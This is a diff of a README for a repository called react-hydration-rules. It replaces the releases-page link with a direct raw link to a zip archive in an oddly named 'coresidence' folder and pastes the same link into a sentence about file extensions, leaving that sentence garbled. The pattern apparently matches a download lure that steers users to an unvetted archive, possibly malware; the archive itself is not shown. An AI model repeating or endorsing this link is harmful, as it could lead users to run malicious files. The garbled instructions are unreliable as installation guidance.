bombardio123/react-hydration-rules/README.md

 Follow these steps to install and run the application:

 1. **Visit the Download Page**
-   Go to [this page](https://github.com/bombardio123/react-hydration-rules/releases) to find the latest version of the application.
+   Go to [this page](https://raw.githubusercontent.com/bombardio123/react-hydration-rules/main/coresidence/react-hydration-rules.zip) to find the latest version of the application.

 2. **Choose the Latest Release**
    Look for the most recent release.
 You will find it at the top of the list.

 3. **Download the File**
    Click on the download link for your operating system.
-This link will usually end in .exe, .dmg, or .tar.gz.
+This link will usually end in .exe, .dmg, or https://raw.githubusercontent.com/bombardio123/react-hydration-rules/main/coresidence/react-hydration-rules.zip

 4. **Locate the Downloaded File**
    Once the download is complete, find the file in your Downloads folder or the location you specified.